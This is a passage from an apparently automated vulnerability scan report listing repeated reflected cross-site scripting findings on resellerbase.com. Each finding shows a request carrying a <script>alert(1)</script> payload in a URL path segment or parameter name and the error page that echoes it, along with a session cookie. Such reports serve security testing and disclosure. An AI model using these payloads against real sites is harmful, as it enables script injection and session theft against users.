This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service6b68b<script>alert(1)</script>5d087b534d1/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service6b68b<script>alert(1)</script>5d087b534d1/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.5400. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91b3a<script>alert(1)</script>02f7f31956c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes91b3a<script>alert(1)</script>02f7f31956c/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes91b3a<script>alert(1)</script>02f7f31956c/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.5401. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e8202<script>alert(1)</script>a758876942b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmose8202<script>alert(1)</script>a758876942b/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmose8202<script>alert(1)</script>a758876942b/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.5402. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 920bc<script>alert(1)</script>634ccb1c656 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images920bc<script>alert(1)</script>634ccb1c656/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images920bc<script>alert(1)</script>634ccb1c656/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.5403. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97924<script>alert(1)</script>b465d77f2e5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating97924<script>alert(1)</script>b465d77f2e5/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating97924<script>alert(1)</script>b465d77f2e5/2half.gif was not found on this server.</p>
...[SNIP]...

2.5404. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8fdbc<script>alert(1)</script>2b2bf6c97ba was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/2half.gif8fdbc<script>alert(1)</script>2b2bf6c97ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/2half.gif8fdbc<script>alert(1)</script>2b2bf6c97ba was not found on this server.</p>
...[SNIP]...

2.5405. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/2half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d57e<script>alert(1)</script>a1e985cd575 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/2half.gif?2d57e<script>alert(1)</script>a1e985cd575=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/2half.gif?2d57e<script>alert(1)</script>a1e985cd575=1 was not found on this server.</p>
...[SNIP]...

2.5406. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b955<script>alert(1)</script>5bd1fabd981 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service6b955<script>alert(1)</script>5bd1fabd981/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service6b955<script>alert(1)</script>5bd1fabd981/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5407. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 67a96<script>alert(1)</script>c7cefc704d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes67a96<script>alert(1)</script>c7cefc704d4/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes67a96<script>alert(1)</script>c7cefc704d4/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5408. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7cc7e<script>alert(1)</script>9a538b3b452 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos7cc7e<script>alert(1)</script>9a538b3b452/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos7cc7e<script>alert(1)</script>9a538b3b452/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5409. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c96d<script>alert(1)</script>04f45c9253 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images8c96d<script>alert(1)</script>04f45c9253/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images8c96d<script>alert(1)</script>04f45c9253/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5410. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d96d4<script>alert(1)</script>a6691086a10 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/ratingd96d4<script>alert(1)</script>a6691086a10/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/ratingd96d4<script>alert(1)</script>a6691086a10/3.gif was not found on this server.</p>
...[SNIP]...

2.5411. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2a3b0<script>alert(1)</script>7e879b2e10 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/3.gif2a3b0<script>alert(1)</script>7e879b2e10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/3.gif2a3b0<script>alert(1)</script>7e879b2e10 was not found on this server.</p>
...[SNIP]...

2.5412. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0030<script>alert(1)</script>cc7d6575d83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/3.gif?e0030<script>alert(1)</script>cc7d6575d83=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/3.gif?e0030<script>alert(1)</script>cc7d6575d83=1 was not found on this server.</p>
...[SNIP]...

2.5413. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a20fc<script>alert(1)</script>ac64bc8bb09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea20fc<script>alert(1)</script>ac64bc8bb09/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea20fc<script>alert(1)</script>ac64bc8bb09/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5414. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8803<script>alert(1)</script>549bc4b9a38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesb8803<script>alert(1)</script>549bc4b9a38/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesb8803<script>alert(1)</script>549bc4b9a38/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5415. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae88f<script>alert(1)</script>22e7cc9468f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosae88f<script>alert(1)</script>22e7cc9468f/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosae88f<script>alert(1)</script>22e7cc9468f/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5416. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 356b9<script>alert(1)</script>64df9ea5b01 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images356b9<script>alert(1)</script>64df9ea5b01/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images356b9<script>alert(1)</script>64df9ea5b01/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5417. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9e453<script>alert(1)</script>ac26e257fda was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating9e453<script>alert(1)</script>ac26e257fda/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating9e453<script>alert(1)</script>ac26e257fda/3half.gif was not found on this server.</p>
...[SNIP]...

2.5418. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f3482<script>alert(1)</script>e6ac0f31f7f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/3half.giff3482<script>alert(1)</script>e6ac0f31f7f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:12 GMT
Server: Apache/2
